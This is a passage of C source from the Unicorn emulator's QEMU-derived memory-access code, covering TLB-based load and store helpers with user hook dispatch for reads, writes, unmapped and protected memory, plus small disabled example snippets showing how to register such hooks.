(unlikely(tlb_addr & TLB_NOTDIRTY)) { notdirty_write(env_cpu(env), addr, 1 << s_bits, &env_tlb(env)->d[mmu_idx].iotlb[index], retaddr, NULL); } return hostaddr; stop_the_world: cpu_loop_exit_atomic(env_cpu(env), retaddr); } /* * Load Helpers * * We support two different access types. SOFTMMU_CODE_ACCESS is * specifically for reading instructions from system memory. It is * called by the translation loop and in some helpers where the code * is disassembled. It shouldn't be called directly by guest code. */ typedef uint64_t FullLoadHelper(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr); static inline uint64_t load_memop(const void *haddr, MemOp op) { switch (op) { case MO_UB: return ldub_p(haddr); case MO_BEUW: return lduw_be_p(haddr); case MO_LEUW: return lduw_le_p(haddr); case MO_BEUL: return (uint32_t)ldl_be_p(haddr); case MO_LEUL: return (uint32_t)ldl_le_p(haddr); case MO_BEQ: return ldq_be_p(haddr); case MO_LEQ: return ldq_le_p(haddr); default: // qemu_build_not_reached(); return 0; } } static inline uint64_t load_helper(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr, MemOp op, bool code_read, FullLoadHelper *full_load) { uintptr_t mmu_idx = get_mmuidx(oi); uintptr_t index = tlb_index(env, mmu_idx, addr); CPUTLBEntry *entry = tlb_entry(env, mmu_idx, addr); target_ulong tlb_addr = code_read ? entry->addr_code : entry->addr_read; target_ulong paddr; const size_t tlb_off = code_read ? offsetof(CPUTLBEntry, addr_code) : offsetof(CPUTLBEntry, addr_read); const MMUAccessType access_type = code_read ? MMU_INST_FETCH : MMU_DATA_LOAD; unsigned a_bits = get_alignment_bits(get_memop(oi)); void *haddr; uint64_t res; size_t size = memop_size(op); int error_code; struct hook *hook; bool handled; HOOK_FOREACH_VAR_DECLARE; struct uc_struct *uc = env->uc; MemoryRegion *mr; /* Handle CPU specific unaligned behaviour */ if (addr & ((1 << a_bits) - 1)) { cpu_unaligned_access(env_cpu(env), addr, access_type, mmu_idx, retaddr); } /* If the TLB entry is for a different page, reload and try again. */ if (!tlb_hit(env->uc, tlb_addr, addr)) { if (!victim_tlb_hit(env, mmu_idx, index, tlb_off, addr & TARGET_PAGE_MASK)) { tlb_fill(env_cpu(env), addr, size, access_type, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = code_read ? 
                   entry->addr_code : entry->addr_read;
        tlb_addr &= ~TLB_INVALID_MASK;
    }

    paddr = entry->paddr | (addr & ~TARGET_PAGE_MASK);
    mr = uc->memory_mapping(uc, paddr);

    // memory might be still unmapped while reading or fetching
    if (mr == NULL) {
        handled = false;
        // if there is already an unhandled error, skip callbacks.
        if (uc->invalid_error == UC_ERR_OK) {
            if (code_read) {
                // code fetching
                error_code = UC_ERR_FETCH_UNMAPPED;
                HOOK_FOREACH(uc, hook, UC_HOOK_MEM_FETCH_UNMAPPED) {
                    if (hook->to_delete)
                        continue;
                    if (!HOOK_BOUND_CHECK(hook, paddr))
                        continue;
                    JIT_CALLBACK_GUARD_VAR(handled, ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_FETCH_UNMAPPED, paddr, size, 0, hook->user_data));
                    if (handled)
                        break;

                    // the last callback may have already asked to stop emulation
                    if (uc->stop_request)
                        break;
                }
            } else {
                // data reading
                error_code = UC_ERR_READ_UNMAPPED;
                HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_UNMAPPED) {
                    if (hook->to_delete)
                        continue;
                    if (!HOOK_BOUND_CHECK(hook, paddr))
                        continue;
                    JIT_CALLBACK_GUARD_VAR(handled, ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_READ_UNMAPPED, paddr, size, 0, hook->user_data));
                    if (handled)
                        break;

                    // the last callback may have already asked to stop emulation
                    if (uc->stop_request)
                        break;
                }
            }
        } else {
            error_code = uc->invalid_error;
        }

        if (handled) {
            uc->invalid_error = UC_ERR_OK;
            /* If the TLB entry is for a different page, reload and try again. */
            if (!tlb_hit(env->uc, tlb_addr, addr)) {
                if (!victim_tlb_hit(env, mmu_idx, index, tlb_off,
                                    addr & TARGET_PAGE_MASK)) {
                    tlb_fill(env_cpu(env), addr, size,
                             access_type, mmu_idx, retaddr);
                    index = tlb_index(env, mmu_idx, addr);
                    entry = tlb_entry(env, mmu_idx, addr);
                }
                tlb_addr = code_read ? entry->addr_code : entry->addr_read;
                tlb_addr &= ~TLB_INVALID_MASK;
            }
            paddr = entry->paddr | (addr & ~TARGET_PAGE_MASK);
            mr = uc->memory_mapping(uc, paddr);
            if (mr == NULL) {
                uc->invalid_error = UC_ERR_MAP;
                if (uc->nested_level > 0 && !uc->cpu->stopped) {
                    cpu_exit(uc->cpu);
                    // XXX(@lazymio): We have to exit early so that the target register won't be overwritten
                    // because qemu might generate tcg code like:
                    //    qemu_ld_i64 x0,x1,leq,8  sync: 0  dead: 0 1
                    // where we don't have a chance to recover x0 value
                    cpu_loop_exit(uc->cpu);
                }
                return 0;
            }
        } else {
            uc->invalid_addr = paddr;
            uc->invalid_error = error_code;
            // printf("***** Invalid fetch (unmapped memory) at " TARGET_FMT_lx "\n", addr);
            if (uc->nested_level > 0 && !uc->cpu->stopped) {
                cpu_exit(uc->cpu);
                // See comments above
                cpu_loop_exit(uc->cpu);
            }
            return 0;
        }
    }

    // now it is read on mapped memory
    if (!code_read) {
        // this is data reading
        HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ) {
            if (hook->to_delete)
                continue;
            if (!HOOK_BOUND_CHECK(hook, paddr))
                continue;
            JIT_CALLBACK_GUARD(((uc_cb_hookmem_t)hook->callback)(env->uc, UC_MEM_READ, paddr, size, 0, hook->user_data));

            // the last callback may have already asked to stop emulation
            if (uc->stop_request)
                break;
        }

        // callback on non-readable memory
        if (mr != NULL && !(mr->perms & UC_PROT_READ)) { // non-readable
            handled = false;
            HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_PROT) {
                if (hook->to_delete)
                    continue;
                if (!HOOK_BOUND_CHECK(hook, paddr))
                    continue;
                JIT_CALLBACK_GUARD_VAR(handled, ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_READ_PROT, paddr, size, 0, hook->user_data));
                if (handled)
                    break;

                // the last callback may have already asked to stop emulation
                if (uc->stop_request)
                    break;
            }

            if (handled) {
                uc->invalid_error = UC_ERR_OK;
                /* If the TLB entry is for a different page, reload and try again. */
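                /*
                 * Host-side sketch (illustrative; not part of this file):
                 * this reload-and-retry is what lets a hook recover a
                 * faulting access.  A UC_HOOK_MEM_READ_UNMAPPED callback
                 * that maps the missing page and returns true makes
                 * load_helper() re-fill the TLB and complete the load;
                 * a UC_HOOK_MEM_READ_PROT callback returning true, as
                 * here, is retried the same way.  All names below are
                 * hypothetical user code; a 4 KiB page size is assumed.
                 */
#if 0
#include <unicorn/unicorn.h>

static bool map_on_demand(uc_engine *uc, uc_mem_type type, uint64_t address,
                          int size, int64_t value, void *user_data)
{
    /* Back the faulting page with fresh zeroed RAM, then ask for a retry. */
    uc_mem_map(uc, address & ~0xfffULL, 0x1000, UC_PROT_ALL);
    return true; /* handled: Unicorn re-runs the faulting access */
}

static void install_map_on_demand(uc_engine *uc)
{
    uc_hook hh;
    /* begin > end (1, 0) registers the hook for the whole address space */
    uc_hook_add(uc, &hh, UC_HOOK_MEM_READ_UNMAPPED,
                (void *)map_on_demand, NULL, 1, 0);
}
#endif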
                if (!tlb_hit(env->uc, tlb_addr, addr)) {
                    if (!victim_tlb_hit(env, mmu_idx, index, tlb_off,
                                        addr & TARGET_PAGE_MASK)) {
                        tlb_fill(env_cpu(env), addr, size,
                                 access_type, mmu_idx, retaddr);
                        index = tlb_index(env, mmu_idx, addr);
                        entry = tlb_entry(env, mmu_idx, addr);
                    }
                    tlb_addr = code_read ? entry->addr_code : entry->addr_read;
                    tlb_addr &= ~TLB_INVALID_MASK;
                }
            } else {
                uc->invalid_addr = paddr;
                uc->invalid_error = UC_ERR_READ_PROT;
                // printf("***** Invalid memory read (non-readable) at " TARGET_FMT_lx "\n", addr);
                if (uc->nested_level > 0 && !uc->cpu->stopped) {
                    cpu_exit(uc->cpu);
                    // See comments above
                    cpu_loop_exit(uc->cpu);
                }
                return 0;
            }
        }
    } else {
        // code fetching
        // Unicorn: callback on fetch from NX
        if (mr != NULL && !(mr->perms & UC_PROT_EXEC)) { // non-executable
            handled = false;
            HOOK_FOREACH(uc, hook, UC_HOOK_MEM_FETCH_PROT) {
                if (hook->to_delete)
                    continue;
                if (!HOOK_BOUND_CHECK(hook, paddr))
                    continue;
                JIT_CALLBACK_GUARD_VAR(handled, ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_FETCH_PROT, paddr, size, 0, hook->user_data));
                if (handled)
                    break;

                // the last callback may have already asked to stop emulation
                if (uc->stop_request)
                    break;
            }

            if (handled) {
                uc->invalid_error = UC_ERR_OK;
            } else {
                uc->invalid_addr = paddr;
                uc->invalid_error = UC_ERR_FETCH_PROT;
                // printf("***** Invalid fetch (non-executable) at " TARGET_FMT_lx "\n", addr);
                if (uc->nested_level > 0 && !uc->cpu->stopped) {
                    cpu_exit(uc->cpu);
                    // See comments above
                    cpu_loop_exit(uc->cpu);
                }
                return 0;
            }
        }
    }

    /* Handle anything that isn't just a straight memory access.  */
    if (unlikely(tlb_addr & ~TARGET_PAGE_MASK)) {
        CPUIOTLBEntry *iotlbentry;
        bool need_swap;

        /* For anything that is unaligned, recurse through full_load.  */
        if ((addr & (size - 1)) != 0) {
            goto do_unaligned_access;
        }

        iotlbentry = &env_tlb(env)->d[mmu_idx].iotlb[index];

        /* Handle watchpoints.  */
        if (unlikely(tlb_addr & TLB_WATCHPOINT)) {
            /* On watchpoint hit, this will longjmp out.  */
            cpu_check_watchpoint(env_cpu(env), addr, size,
                                 iotlbentry->attrs, BP_MEM_READ, retaddr);
        }

        need_swap = size > 1 && (tlb_addr & TLB_BSWAP);

        /* Handle I/O access.  */
        if (likely(tlb_addr & TLB_MMIO)) {
            res = io_readx(env, iotlbentry, mmu_idx, addr, retaddr,
                           access_type, op ^ (need_swap * MO_BSWAP));
            goto _out;
        }

        haddr = (void *)((uintptr_t)addr + entry->addend);

        /*
         * Keep these two load_memop separate to ensure that the compiler
         * is able to fold the entire function to a single instruction.
         * There is a build-time assert inside to remind you of this.  ;-)
         */
        if (unlikely(need_swap)) {
            res = load_memop(haddr, op ^ MO_BSWAP);
            goto _out;
        }
        res = load_memop(haddr, op);
        goto _out;
    }

    /* Handle slow unaligned access (it spans two pages or IO).  */
    if (size > 1
        && unlikely((addr & ~TARGET_PAGE_MASK) + size - 1
                    >= TARGET_PAGE_SIZE)) {
        target_ulong addr1, addr2;
        uint64_t r1, r2;
        unsigned shift;
        int old_size;
    do_unaligned_access:
        addr1 = addr & ~((target_ulong)size - 1);
        addr2 = addr1 + size;
        old_size = uc->size_recur_mem;
        uc->size_recur_mem = size;
        r1 = full_load(env, addr1, oi, retaddr);
        r2 = full_load(env, addr2, oi, retaddr);
        uc->size_recur_mem = old_size;
        shift = (addr & (size - 1)) * 8;

        if (memop_big_endian(op)) {
            /* Big-endian combine.  */
            res = (r1 << shift) | (r2 >> ((size * 8) - shift));
        } else {
            /* Little-endian combine.
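             *
             * Worked example (illustrative): a 4-byte little-endian load
             * at addr == 0x1003 splits into r1 = full_load(0x1000) and
             * r2 = full_load(0x1004); shift == 3 * 8 == 24, so the result
             * below is (r1 >> 24) | (r2 << 8), masked to 32 bits.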
*/ res = (r1 >> shift) | (r2 << ((size * 8) - shift)); } res = res & MAKE_64BIT_MASK(0, size * 8); goto _out; } haddr = (void *)((uintptr_t)addr + entry->addend); res = load_memop(haddr, op); _out: // Unicorn: callback on successful data read if (!code_read) { if (!uc->size_recur_mem) { // disabling read callback if in recursive call HOOK_FOREACH(uc, hook, UC_HOOK_MEM_READ_AFTER) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, paddr)) continue; JIT_CALLBACK_GUARD(((uc_cb_hookmem_t)hook->callback)(env->uc, UC_MEM_READ_AFTER, paddr, size, res, hook->user_data)); // the last callback may already asked to stop emulation if (uc->stop_request) break; } } } return res; } /* * For the benefit of TCG generated code, we want to avoid the * complication of ABI-specific return type promotion and always * return a value extended to the register size of the host. This is * tcg_target_long, except in the case of a 32-bit host and 64-bit * data, and for that we always have uint64_t. * * We don't bother with this widened value for SOFTMMU_CODE_ACCESS. */ static uint64_t full_ldub_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_UB, false, full_ldub_mmu); } tcg_target_ulong helper_ret_ldub_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return full_ldub_mmu(env, addr, oi, retaddr); } static uint64_t full_le_lduw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_LEUW, false, full_le_lduw_mmu); } tcg_target_ulong helper_le_lduw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return full_le_lduw_mmu(env, addr, oi, retaddr); } static uint64_t full_be_lduw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_BEUW, false, full_be_lduw_mmu); } tcg_target_ulong helper_be_lduw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return full_be_lduw_mmu(env, addr, oi, retaddr); } static uint64_t full_le_ldul_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_LEUL, false, full_le_ldul_mmu); } tcg_target_ulong helper_le_ldul_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return full_le_ldul_mmu(env, addr, oi, retaddr); } static uint64_t full_be_ldul_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_BEUL, false, full_be_ldul_mmu); } tcg_target_ulong helper_be_ldul_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return full_be_ldul_mmu(env, addr, oi, retaddr); } uint64_t helper_le_ldq_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_LEQ, false, helper_le_ldq_mmu); } uint64_t helper_be_ldq_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return load_helper(env, addr, oi, retaddr, MO_BEQ, false, helper_be_ldq_mmu); } /* * Provide signed versions of the load routines as well. We can of course * avoid this for 64-bit data, or for 32-bit data on 32-bit host. 
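 *
 * (For example, a byte load of 0xff through helper_ret_ldsb_mmu() below
 * returns (int8_t)0xff == -1, sign-extended to tcg_target_ulong.)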
*/ tcg_target_ulong helper_ret_ldsb_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return (int8_t)helper_ret_ldub_mmu(env, addr, oi, retaddr); } tcg_target_ulong helper_le_ldsw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return (int16_t)helper_le_lduw_mmu(env, addr, oi, retaddr); } tcg_target_ulong helper_be_ldsw_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return (int16_t)helper_be_lduw_mmu(env, addr, oi, retaddr); } tcg_target_ulong helper_le_ldsl_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return (int32_t)helper_le_ldul_mmu(env, addr, oi, retaddr); } tcg_target_ulong helper_be_ldsl_mmu(CPUArchState *env, target_ulong addr, TCGMemOpIdx oi, uintptr_t retaddr) { return (int32_t)helper_be_ldul_mmu(env, addr, oi, retaddr); } /* * Load helpers for cpu_ldst.h. */ static inline uint64_t cpu_load_helper(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t retaddr, MemOp op, FullLoadHelper *full_load) // qq { TCGMemOpIdx oi; uint64_t ret; op &= ~MO_SIGN; oi = make_memop_idx(op, mmu_idx); ret = full_load(env, addr, oi, retaddr); return ret; } uint32_t cpu_ldub_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra) { return cpu_load_helper(env, addr, mmu_idx, ra, MO_UB, full_ldub_mmu); } int cpu_ldsb_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra) { return (int8_t)cpu_load_helper(env, addr, mmu_idx, ra, MO_SB, full_ldub_mmu); } uint32_t cpu_lduw_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra) { return cpu_load_helper(env, addr, mmu_idx, ra, MO_TEUW, MO_TE == MO_LE ? full_le_lduw_mmu : full_be_lduw_mmu); } int cpu_ldsw_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra) { return (int16_t)cpu_load_helper(env, addr, mmu_idx, ra, MO_TESW, MO_TE == MO_LE ? full_le_lduw_mmu : full_be_lduw_mmu); } uint32_t cpu_ldl_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra) { return cpu_load_helper(env, addr, mmu_idx, ra, MO_TEUL, MO_TE == MO_LE ? full_le_ldul_mmu : full_be_ldul_mmu); } uint64_t cpu_ldq_mmuidx_ra(CPUArchState *env, abi_ptr addr, int mmu_idx, uintptr_t ra) { return cpu_load_helper(env, addr, mmu_idx, ra, MO_TEQ, MO_TE == MO_LE ? 
helper_le_ldq_mmu : helper_be_ldq_mmu); } uint32_t cpu_ldub_data_ra(CPUArchState *env, target_ulong ptr, uintptr_t retaddr) { return cpu_ldub_mmuidx_ra(env, ptr, cpu_mmu_index(env, false), retaddr); } int cpu_ldsb_data_ra(CPUArchState *env, target_ulong ptr, uintptr_t retaddr) { return cpu_ldsb_mmuidx_ra(env, ptr, cpu_mmu_index(env, false), retaddr); } uint32_t cpu_lduw_data_ra(CPUArchState *env, target_ulong ptr, uintptr_t retaddr) { return cpu_lduw_mmuidx_ra(env, ptr, cpu_mmu_index(env, false), retaddr); } int cpu_ldsw_data_ra(CPUArchState *env, target_ulong ptr, uintptr_t retaddr) { return cpu_ldsw_mmuidx_ra(env, ptr, cpu_mmu_index(env, false), retaddr); } uint32_t cpu_ldl_data_ra(CPUArchState *env, target_ulong ptr, uintptr_t retaddr) { return cpu_ldl_mmuidx_ra(env, ptr, cpu_mmu_index(env, false), retaddr); } uint64_t cpu_ldq_data_ra(CPUArchState *env, target_ulong ptr, uintptr_t retaddr) { return cpu_ldq_mmuidx_ra(env, ptr, cpu_mmu_index(env, false), retaddr); } uint32_t cpu_ldub_data(CPUArchState *env, target_ulong ptr) { return cpu_ldub_data_ra(env, ptr, 0); } int cpu_ldsb_data(CPUArchState *env, target_ulong ptr) { return cpu_ldsb_data_ra(env, ptr, 0); } uint32_t cpu_lduw_data(CPUArchState *env, target_ulong ptr) { return cpu_lduw_data_ra(env, ptr, 0); } int cpu_ldsw_data(CPUArchState *env, target_ulong ptr) { return cpu_ldsw_data_ra(env, ptr, 0); } uint32_t cpu_ldl_data(CPUArchState *env, target_ulong ptr) { return cpu_ldl_data_ra(env, ptr, 0); } uint64_t cpu_ldq_data(CPUArchState *env, target_ulong ptr) { return cpu_ldq_data_ra(env, ptr, 0); } /* * Store Helpers */ static inline void store_memop(void *haddr, uint64_t val, MemOp op) { switch (op) { case MO_UB: stb_p(haddr, val); break; case MO_BEUW: stw_be_p(haddr, val); break; case MO_LEUW: stw_le_p(haddr, val); break; case MO_BEUL: stl_be_p(haddr, val); break; case MO_LEUL: stl_le_p(haddr, val); break; case MO_BEQ: stq_be_p(haddr, val); break; case MO_LEQ: stq_le_p(haddr, val); break; default: // qemu_build_not_reached(); break; } } static inline void store_helper(CPUArchState *env, target_ulong addr, uint64_t val, TCGMemOpIdx oi, uintptr_t retaddr, MemOp op) { struct uc_struct *uc = env->uc; HOOK_FOREACH_VAR_DECLARE; uintptr_t mmu_idx = get_mmuidx(oi); uintptr_t index = tlb_index(env, mmu_idx, addr); CPUTLBEntry *entry = tlb_entry(env, mmu_idx, addr); target_ulong tlb_addr = tlb_addr_write(entry); target_ulong paddr; const size_t tlb_off = offsetof(CPUTLBEntry, addr_write); unsigned a_bits = get_alignment_bits(get_memop(oi)); void *haddr; size_t size = memop_size(op); struct hook *hook; bool handled; MemoryRegion *mr; /* Handle CPU specific unaligned behaviour */ if (addr & ((1 << a_bits) - 1)) { cpu_unaligned_access(env_cpu(env), addr, MMU_DATA_STORE, mmu_idx, retaddr); } /* If the TLB entry is for a different page, reload and try again. */ if (!tlb_hit(env->uc, tlb_addr, addr)) { if (!victim_tlb_hit(env, mmu_idx, index, tlb_off, addr & TARGET_PAGE_MASK)) { tlb_fill(env_cpu(env), addr, size, MMU_DATA_STORE, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = tlb_addr_write(entry) & ~TLB_INVALID_MASK; } // Load the latest memory mapping. 
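    /*
     * Host-side sketch (illustrative; not part of this file): the
     * UC_HOOK_MEM_WRITE callbacks dispatched just below observe the
     * physical address, access size and value before the store is
     * performed, which is enough for a simple write tracer.  All names
     * are hypothetical user code.
     */
#if 0
#include <inttypes.h>
#include <stdio.h>
#include <unicorn/unicorn.h>

static void trace_write(uc_engine *uc, uc_mem_type type, uint64_t address,
                        int size, int64_t value, void *user_data)
{
    printf("write: %d bytes @ 0x%" PRIx64 " = 0x%" PRIx64 "\n",
           size, address, (uint64_t)value);
}

static void install_write_tracer(uc_engine *uc)
{
    uc_hook hh;
    /* begin > end (1, 0) registers the hook for the whole address space */
    uc_hook_add(uc, &hh, UC_HOOK_MEM_WRITE, (void *)trace_write, NULL, 1, 0);
}
#endif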
paddr = entry->paddr | (addr & ~TARGET_PAGE_MASK); mr = uc->memory_mapping(uc, paddr); if (!uc->size_recur_mem) { // disable write callbacks when in a recursive call // Unicorn: callback on memory write HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, paddr)) continue; JIT_CALLBACK_GUARD(((uc_cb_hookmem_t)hook->callback)(uc, UC_MEM_WRITE, paddr, size, val, hook->user_data)); // the last callback may have already asked to stop emulation if (uc->stop_request) break; } } // Unicorn: callback on invalid memory if (mr == NULL) { handled = false; HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE_UNMAPPED) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, paddr)) continue; JIT_CALLBACK_GUARD_VAR(handled, ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_WRITE_UNMAPPED, paddr, size, val, hook->user_data)); if (handled) break; // the last callback may have already asked to stop emulation if (uc->stop_request) break; } if (!handled) { // save error & quit uc->invalid_addr = paddr; uc->invalid_error = UC_ERR_WRITE_UNMAPPED; // printf("***** Invalid memory write at " TARGET_FMT_lx "\n", addr); cpu_exit(uc->cpu); return; } else { uc->invalid_error = UC_ERR_OK; /* If the TLB entry is for a different page, reload and try again. */ if (!tlb_hit(env->uc, tlb_addr, addr)) { if (!victim_tlb_hit(env, mmu_idx, index, tlb_off, addr & TARGET_PAGE_MASK)) { tlb_fill(env_cpu(env), addr, size, MMU_DATA_STORE, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = tlb_addr_write(entry) & ~TLB_INVALID_MASK; } paddr = entry->paddr | (addr & ~TARGET_PAGE_MASK); mr = uc->memory_mapping(uc, paddr); if (mr == NULL) { uc->invalid_error = UC_ERR_MAP; cpu_exit(uc->cpu); return; } } } // Unicorn: callback on non-writable memory if (mr != NULL && !(mr->perms & UC_PROT_WRITE)) { //non-writable // printf("not writable memory???\n"); handled = false; HOOK_FOREACH(uc, hook, UC_HOOK_MEM_WRITE_PROT) { if (hook->to_delete) continue; if (!HOOK_BOUND_CHECK(hook, paddr)) continue; JIT_CALLBACK_GUARD_VAR(handled, ((uc_cb_eventmem_t)hook->callback)(uc, UC_MEM_WRITE_PROT, paddr, size, val, hook->user_data)); if (handled) break; // the last callback may have already asked to stop emulation if (uc->stop_request) break; } if (handled) { /* If the TLB entry is for a different page, reload and try again. */ if (!tlb_hit(env->uc, tlb_addr, addr)) { if (!victim_tlb_hit(env, mmu_idx, index, tlb_off, addr & TARGET_PAGE_MASK)) { tlb_fill(env_cpu(env), addr, size, MMU_DATA_STORE, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); } tlb_addr = tlb_addr_write(entry) & ~TLB_INVALID_MASK; } uc->invalid_error = UC_ERR_OK; } else { uc->invalid_addr = paddr; uc->invalid_error = UC_ERR_WRITE_PROT; // printf("***** Invalid memory write (ro) at " TARGET_FMT_lx "\n", addr); cpu_exit(uc->cpu); return; } } if (uc->snapshot_level && mr->ram && mr->priority < uc->snapshot_level) { mr = memory_cow(uc, mr, paddr & TARGET_PAGE_MASK, TARGET_PAGE_SIZE); if (!mr) { uc->invalid_addr = paddr; uc->invalid_error = UC_ERR_NOMEM; cpu_exit(uc->cpu); return; } /* refill tlb after CoW */ tlb_fill(env_cpu(env), addr, size, MMU_DATA_STORE, mmu_idx, retaddr); index = tlb_index(env, mmu_idx, addr); entry = tlb_entry(env, mmu_idx, addr); tlb_addr = tlb_addr_write(entry); } /* Handle anything that isn't just a straight memory access. 
*/ if (unlikely(tlb_addr & ~TARGET_PAGE_MASK)) { CPUIOTLBEntry *iotlbentry; bool need_swap; /* For anything that is unaligned, recurse through byte stores. */ if ((addr & (size - 1)) != 0) { goto do_unaligned_access; } iotlbentry = &env_tlb(env)->d[mmu_idx].iotlb[index]; /* Handle watchpoints. */ if (unlikely(tlb_addr & TLB_WATCHPOINT)) { /* On watchpoint hit, this will longjmp out. */ cpu_check_watchpoint(env_cpu(env), addr, size, iotlbentry->attrs, BP_MEM_WRITE, retaddr); } need_swap = size > 1 && (tlb_addr & TLB_BSWAP); /* Handle I/O access. */ if (tlb_addr & TLB_MMIO) { io_writex(env, iotlbentry, mmu_idx, val, addr, retaddr, op ^ (need_swap * MO_BSWAP)); return; } /* Ignore writes to ROM. */ if (unlikely(tlb_addr & TLB_DISCARD_WRITE)) { return; } /* Handle clean RAM pages. */ if (tlb_addr & TLB_NOTDIRTY) { notdirty_write(env_cpu(env), addr, size, iotlbentry, retaddr, mr); } haddr = (void *)((uintptr_t)addr + entry->addend); /* * Keep these two store_memop separate to ensure that the compiler * is able to fold the entire function to a single instruction. * There is a build-time assert inside to remind you of this. ;-) */ if (unlikely(need_swap)) { store_memop(haddr, val, op ^ MO_BSWAP); } else { store_memop(haddr, val, op); } return; } /* Handle slow unaligned access (it spans two pages or IO). */ if (size > 1 && unlikely((addr & ~TARGET_PAGE_MASK) + size - 1 >= TARGET_PAGE_SIZE)) { int i; uintptr_t index2; CPUTLBEntry *entry2; target_ulong page2, tlb_addr2; size_t size2; int old_size; do_unaligned_access: /* * Ensure the second page is in the TLB. Note that the first page * is already guaranteed to be filled, and that the second page * cannot evict the first. */ page2 = (addr + size) & TARGET_PAGE_MASK; size2 = (addr + size) & ~TARGET_PAGE_MASK; index2 = tlb_index(env, mmu_idx, page2); entry2 = tlb_entry(env, mmu_idx, page2); tlb_addr2 = tlb_addr_write(entry2); if (!tlb_hit_page(uc, tlb_addr2, page2)) { if (!victim_tlb_hit(env, mmu_idx, index2, tlb_off, page2)) { tlb_fill(env_cpu(env), page2, size2, MMU_DATA_STORE, mmu_idx, retaddr); index2 = tlb_index(env, mmu_idx, page2); entry2 = tlb_entry(env, mmu_idx, page2); } tlb_addr2 = tlb_addr_write(entry2); } /* * Handle watchpoints. Since this may trap, all checks * must happen before any store. */ if (unlikely(tlb_addr & TLB_WATCHPOINT)) { cpu_check_watchpoint(env_cpu(env), addr, size - size2, env_tlb(env)->d[mmu_idx].iotlb[index].attrs, BP_MEM_WRITE, retaddr); } if (unlikely(tlb_addr2 & TLB_WATCHPOINT)) { cpu_check_watchpoint(env_cpu(env), page2, size2, env_tlb(env)->d[mmu_idx].iotlb[index2].attrs, BP_MEM_WRITE, retaddr); } /* * XXX: not efficient, but simple. * This loop must go in the forward direction to avoid issues * with self-modifying code in Windows 64-bit. */ old_size = uc->size_recur_mem; uc->size_recur_mem = size; for (i = 0; i < size; ++i) { uint8_t val8; if (memop_big_endian(op)) { /* Big-endian extract. */ val8 = val >> (((size - 1) * 8) - (i * 8)); } else { /* Little-endian extract. 
